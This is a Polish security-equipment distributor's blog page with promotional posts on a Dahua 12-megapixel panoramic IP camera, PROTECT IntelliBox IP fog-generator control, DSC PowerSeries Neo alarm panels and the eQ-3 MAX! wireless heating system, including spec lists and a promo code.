Możliwość szerokiej (panoramicznej) prezentacji perspektywy doskonale sprawdzi się w niewielkich, samoobsługowych obiektach handlowych (np. sieci sklepów spożywczych, lub niewielkie punkty handlu detalicznego). Rejestrowany dookólny obraz dzięki zastosowaniu dedykowanego oprogramowania może być przeglądany w formie zbliżonej do funkcjonalności  cyfrowej kamery „obrotowej” (e-ptz), w której wysoka rozdzielczość (12-megapixelowy przetwornik) pozwala na cyfrowy zoom w celu odtworzenia istotnych szczegółów. Podobnie jak w przypadku innych rozwiązań obraz ten może być przeglądany w klasycznej postaci (kadr 360 stopni) lub w podziale nawet do 8 wirtualnych kamer obserwujących wybrany z pełnego kadru obszar.

Podstawowe cechy modelu IPC-EB81200 to m.in:

• 1 / 2.3 „Sensor 12MP Progressive Scan Sony Exmor CMOS
• Max 12MP @ 15fps , 30fps @ 3MP
• H.264 i MJPEG Dual-Stream
• Wiele trybów wyświetlania / w tym panoramiczne
• Maksymalna odległość 10m IR LED
• Gniazdo pamięci microSD
• 2/1 Alarm Input / Output
• IP67 – Stopień ochrony
• Wbudowany mikrofon

Wśród produktów marki Dahua wyróżnione zostały trzy grupy produktów, różniące się pomiędzy sobą możliwościami i parametrami technicznymi.

Lite
  • Rozdzielczość 720P i 1080P
  • Kompaktowe rozwiązania , podstawowe funkcje (smart IR , 2DNR)
  • Mechaniczny filtr IR
  • Obudowa klasa szczelności IP67
Pro
  • Rozdzielczość 720P i 1080P
  • Obiektywy moto-zoom , mechaniczny filtr IR
  • Przełączanie HD/Analog , WDR>120dB (modele 2221)
  • Obudowa klasa szczelności IP67
Ultra
  • Rozdzielczość 720P i 1080P
  • Obiektywy moto-zoom z automatyczną przesłoną, mechaniczny filtr IR
  • Podwójne wyjście lub przełączanie HD/Analog , menu OSD
  • Przetwornik Exmor , DWDR , WDR>120dB (modele 3231) , 3DNR
  • Zasilanie 12VDC/24VAC opcjonalnie grzałki
  • Wejścia / Wyjścia alarmowe
  • Wejście Audio
  • Kamery obrotowe PTZ
  • Obudowa klasa szczelności IP67 , IK10 (wybrane modele)

Zapraszamy do zakupów oraz zapoznania się z naszą ofertą panoramicznych kamer IP dostępnych w naszej platformie B2B https://merchant.weber.pl

VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)
VN:F [1.9.22_1171]
Opublikowany w Monitoring wizyjny, Systemy telewizji dozorowej | Otagowany , , , , , | Możliwość komentowania IPC-EB81200, czyli nowe wysoko-rozdzielcze kamery IP klasy premium wyposażone w 12-megapixelowy przetwornik została wyłączona

PROTECT IntelliBox IP nominowany do nagrody Detector International Award

VN:F [1.9.22_1171]
VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)

Na ramach tego bloga kilkukrotnie opisywaliśmy systemy ochrony mgłą PROTECT, których jesteśmy kanałem sprzedaży. Systemy oparte o generatory mgły (inaczej wyrzutnie mgły, z ang. Fog Cannon), która zasłania widoczność przy wykorzystaniu grubej gęstej nieszkodliwej mgły. Po uruchomieniu urządzeń niemożliwe staje się, aby cokolwiek zobaczyć nie da się zatem również nic ukraść, ani wyrządzić komuś krzywdy.

Dlaczego wspominamy o tych urządzeniach ponownie? Dlatego, że otrzymały one nowe funkcje zdalnego nadzoru z wykorzystaniem połączeń TCP-IP, które pozwalają na więcej kontroli i lepsze zarządzanie. Włączenie zdalnej kontroli, przechowywanie danych, analiza i diagnostyka to wszystko, co staje się możliwe przy wykorzystaniu PROTECT IntelliBox IP.

Z dumą o tym informujemy, tym bardziej,  że IntelliBox IP został nominowany do nagrody Detector International Award w kategorii Alarm i Detekcja.protect_award

Dzięki jednostce sterującej PROTECT IntelliBox możliwa staje się jeszcze łatwiejsza instalacja, obsługa i eksploatacja do szesnastu generatorów mgły w jednej instalacji.protect_ip

 

PROTECT IntelliBox został opracowany w celu ułatwienia monitorowania i obsługi systemu centralnie. Protokół TCP/IP wspierany przez PROTECT IntelliBox IP umożliwia również dostęp przez Internet. W ten sposób można monitorować instalację tak, jakbyśmy stali obok urządzenia.

Inne zalety rozwiązania:

Szczególnie istotne, gdy jednostki generatorów są zainstalowane bardzo wysoko pod sufitem i na znacznych odległościach od siebie;
Szczególnie istotne w prywatnych domach, gdzie wiele osób ceni brak konieczności wyprowadzania dodatkowych przewodów;
Stosowane w instalacjach z jednym generatorem przeznaczonym do ręcznego uruchomienia w przypadku kradzieży i napadu (w sytuacjach zastosować to rozwiązanie jako „panic button”).

IntelliBox obniża koszty i ułatwia instalację i obsługę. Pozwala na łatwe i szybkie podłączenie generatorów do systemu alarmowego. Jedna jednostka i jeden interfejs do centrum sterowania oraz aktualne komunikaty o stanie i błędach wyraźnie prezentowane na wyświetlaczu. Możliwość stosowania infrastruktury przewodowej lub bezprzewodowej (lub mieszanej). Informacje przekazywana z IntelliBox do PC techników serwisujących system przy użyciu oprogramowania IntelliSuite sprawiają, że wszystkie informacje mogą być monitorowane, co ma istotny wpływ na serwis całego systemu i jego niezawodną pracę.

Możliwości w odniesieniu do instalacji:

Z PROTECT IntelliBox możliwa staje się kontrola do szesnastu generatorów mgły w protect_illustration_mainmaksymalnie trzech różnych strefach. W zależności od klasy ochrony, IntelliBox i generatory mgły mogą być połączone poprzez kabel lub zdalnie. Jeśli wybrano kabel IntelliBox połączony jest dwuprzewodową linią komunikacyjną. Jeśli wybrano połączenie bezprzewodowe, IntelliBox musi być wyposażony w IntelliWirelessCard, a generatory mgły muszą być wyposażone w IntelliBusCard i IntelliWirelessCard do odbierania i wysyłania informacji. Kabel i bezprzewodowy zestaw start-up dla tego samego IntelliBox mogą być używane razem w jednej i tej samej instalacji. Stan całego systemu i każdego generatora mgły można w dowolnej chwili odczytać na wyświetlaczu IntelliBox.

Wspomniane urządzenie pracuje ze wszystkimi dotychczas dostępnymi modelami generatorów PROTECT Foqus i Qumulus (do małych powierzchni) i PROTECT i-Series 600i 1100i 2200i (do średnich i dużych powierzchni.) Wspomniane urządzenie są dostępne w naszej sieci dystrybucji, a wkrótce pojawią się również w naszej platformie WeberMerchant B2B, co znacznie ułatwi Państwu przygotowywanie ofert.

VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)
VN:F [1.9.22_1171]
Opublikowany w Alarmy, Generatory dymu (mgły), Inteligentny budynek, Inteligentny dom | Otagowany , , , , , , , , , | Możliwość komentowania PROTECT IntelliBox IP nominowany do nagrody Detector International Award została wyłączona

Nowa seria central alarmowych DSC PowerSeries Neo z dostępem zdalnym z urządzeń mobilnych poprzez Neo Go App

VN:F [1.9.22_1171]
VN:F [1.9.22_1171]
Rating: 4.0/5 (1 vote cast)

Najnowsze centrale DSC PowerSeries Neo to połączenie elastyczności modułowego systemu przewodowego z systemem bezprzewodowym wyposażonym w szeroką gamę urządzeń bezprzewodowych i urządzeń peryferyjnych , w wyniku czego otrzymujemy kompleksowe i hybrydowe w pełni uniwersalne rozwiązanie nadające się zarówno do małych struktur biznesowych czy domowych jak i dużych zastosowań komercyjnych.

neo_appNajwiększą i długo oczekiwaną nowością w systemie PowerSeries Neo jest możliwość korzystania z PowerSeries Neo PowerSeries_Neo_appGo App która oferuje łatwy dostęp do powiadamiania i do stanu systemu praktycznie w dowolnym miejscu i czasie. Aplikacja jest dostępna na system operacyjny Android i urządzenia takie jak iPhone (dostępne na iOS App Store). PowerSeries Neo Go jest kompatybilna z iOS 5 iPhone, iPad i systemem Android icecream sandwich oraz nowszymi wersjami. Dysponujemy już Polską wersją (zainteresowanych zapraszamy do kontaktu.)

Najważniejsze cechy i zalety

System Neo dostępny jest w 4 wersjach płyt głównych, których pojemność zawiera się w zakresie  od 16 do 128 wejść i od 47 do 94 kodów użytkownika, co pozwala na ich stosowanie zarówno do małych mieszkań jak i dużych przedsiębiorstw. Dostępne płyty central można łatwo zintegrować z szeregiem urządzeń bezprzewodowych PowerG oraz szeroką gamą modułów przewodowych i komunikacyjnych (również GSM i IP) które oferują niezawodną ochronę nawet bez tradycyjnej linii telefonicznej.

PowerG to technologia oferująca bezproblemowe, bezpieczne i energooszczędne korzystanie z urządzeń bezprzewodowych – Przełomowe funkcje PowerSeries Neo oparte są na wykorzystaniu dwu torowej technologii komunikacji PowerG która umożliwia zmniejszeni kosztów obsługi jak również zapewnia niezrównaną niezawodność dla użytkowników końcowych. Kluczowe okazuje się tutaj zastosowanie Frequency Hopping Spread Spectrum – jest to technologia która umożliwia wielokanałową pracę na kilku kanałach częstotliwości, unikając w ten sposób ew. zakłóceń i zapewniając stabilne i szybkie połączenie między centralą a urządzeniami. Wysokie bezpieczeństwo komunikacji zapewnia 128-bitowe szyfrowanie AES mające na celu powstrzymywać ew. cyfrowe ataki na system bezprzewodowy.

PowerSeries Neo to również recepta na unikanie kosztów generowanych przez fałszywe alarmy – dzięki nowatorskiemu systemowi weryfikacji alarmu. PowerSeries Neo oferuje trzy metody weryfikacji alarmu. Po pierwsze, weryfikacja wizualna która aktywuje kamerę PIR gdy alarm jest włączony. Po drugie, weryfikacja alarmu poprzez dwukierunkowe audio, które pozwala dostawcy usług bezpieczeństwa podsłuchiwać dane pomieszczenie przez wbudowany mikrofon. Możliwe jest również korzystanie z zestawu głośnomówiącego służącego do komunikowania się z stacją monitorowania. Po trzecie, weryfikacja sekwencyjna którą umożliwia panel sterowania, w oparciu o kryteria, które mogą być spersonalizowane.

PowerSeries Neo to rozwiązania idealne dla systemów wymagających modernizacji. Szeroki wybór klawiatur i bezprzewodowych czujników, pilotów i akcesoriów doHS2ICNRFPstosowanych do własnych potrzeb umożliwia tworzenie różnorodnych konfiguracji.

Klawiatura PowerSeries DSC Neo HS2ICNRFP wyposażona w pięć programowalnych przycisków, dzięki czemu można włączyć zdefiniowaną funkcję za pomocą jednego przycisku. Klawiatura jest dostępna również w wersji wyposażonej w czytnik breloków zbliżeniowych oraz moduł radiowy 868MHz. Do obsługi systemu można również dokupić zbliżeniowe tagi MPT 8PK które oferują łatwiejszy sposób uzbrajania i rozbrajania systemu. Za pomocą tych tagów zbliżeniowych, można uzbroić i rozbroić system, lub po prostu przesuwając brelok przed klawiaturą używać go zamiast wprowadzania kodu bezpieczeństwa.MPT-8PK

Wymienione moduły i akcesoria to tylko niektóre z wielu dostępnych akcesoriów, które można dodać do systemu zwiększając jego możliwości. Już dziś i do końca listopada skorzystaj z bezpłatnej wysyłki oferowanej przy zamówieniach produktów DSC PowerSeries Neo o wartości powyżej 899 zł realizowanych poprzez naszą platformę B2B. Jeśli masz pytania lub wątpliwości przy doborze rozwiązań zapraszamy do kontaktu z naszym działem handlowym. Produkty DSC PowerSeries Neo są dostępne w naszym portfolio od Października 2015.

 

VN:F [1.9.22_1171]
Rating: 4.0/5 (1 vote cast)
VN:F [1.9.22_1171]
Opublikowany w Alarmy | Otagowany , , , , | Możliwość komentowania Nowa seria central alarmowych DSC PowerSeries Neo z dostępem zdalnym z urządzeń mobilnych poprzez Neo Go App została wyłączona

Max! czyli bezprzewodowe sterowanie ogrzewaniem poszczególnych pomieszczeń zgodnie z oczekiwaniami użytkownika

VN:F [1.9.22_1171]
VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)

MAX! to najnowszy i zarazem najtańszy produkt w naszej ofercie bezprzewodowych systemów sterowania ogrzewaniem umożliwiający wielu klientom niedrogie wejście w świat inteligentnego domu. Nie drogie, bo dostępne już nawet poniżej ~1 tyś złotych w przypadku sterowania aż 5 grzejnikami. Produkt wyróżnia dobry stosunek ceny do wydajności. System sterowania ogrzewaniem obejmuje różne składniki, takie jak radio-termostaty grzejnikowe eQ3 Max! i ścienne termostaty pokojowe eQ3 Max!, kontaktrony okienne, bezprzewodowy przycisk Eco, który może umożliwić szybkie, wygodne i jednoczesne przełączenie wszystkich urządzeń w tryb oszczędzania energii. Dzięki temu użytkownik będzie w stanie zaoszczędzić nawet do 30% energii w gospodarstwie domowym. Ta stała oszczędność i niski koszt systemu prowadzi do szybkiej amortyzacji systemu czego nie można powiedzieć o innych dużo droższych rozwiązaniach. Ponadto rozwiązanie sterowania ogrzewaniem EQ-3 pozwala na indywidualne sterowanie temperaturą w obrębie każdego z pomieszczeń. Podczas instalacji MAX! właściciele domów, nie muszą specjalnie ingerować w instalację ani wzywać hydraulika, montaż sprowadza się do założenia głowic termostatycznych i uruchomienia kalibracji, trwa to dosłownie od kilku do kilkunastu minut. Tego typu montaż nie ma istotnego wpływu na kwestie gwarancyjne dla nowych instalacji grzewczych, nie stwarza bowiem konieczności fizycznej ingerencji w instalację i późniejszych problemów z producentem lub dostawcą systemu grzewczego. Ponieważ system EQ-3 jest zamontowany bezpośrednio na element grzewczy, użytkownik zawsze może przeprowadzić modernizację bez użycia narzędzi, specjalistycznej wiedzy i niezależnie od pracy systemu ogrzewania.

MAX! Cube (centrala/bramka systemu) łączy się z Chmurą MAX! która integruje wszystkie 560896komponenty systemu! MAX! może być kontrolowany nie tylko z lokalnego programatora, ale także za pośrednictwem przeglądarki internetowej lub aplikacji iOS i Android. Dzięki takiemu rozwiązaniu obsługa możliwa jest z dowolnego miejsca, a prosty i przyjemny montaż elementów systemu Max! odbywający się na zasadzie plug-and-play spotka się z entuzjazmem nawet najmniej zaawansowanych użytkowników.

System jest świetnym rozwiązaniem dla osób rozpoczynających swoją przygodę ze światem automatyki budynku, funkcjonalnie przemyślany, atrakcyjny pod względem kosztów i oferujący wygodną obsługę. Produkt dostępny w regularnej ofercie i ofercie promocyjnej dla nowych klientów. Zachęcamy do zakupów i skorzystania z kodu promocyjnego który należy podać przy składaniu zamówienia : CVT5-HYNN-23HU, kod ważny do 29 października 2015.

VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)
VN:F [1.9.22_1171]
Opublikowany w Inteligentny budynek, Inteligentny dom | Otagowany , , | Możliwość komentowania Max! czyli bezprzewodowe sterowanie ogrzewaniem poszczególnych pomieszczeń zgodnie z oczekiwaniami użytkownika została wyłączona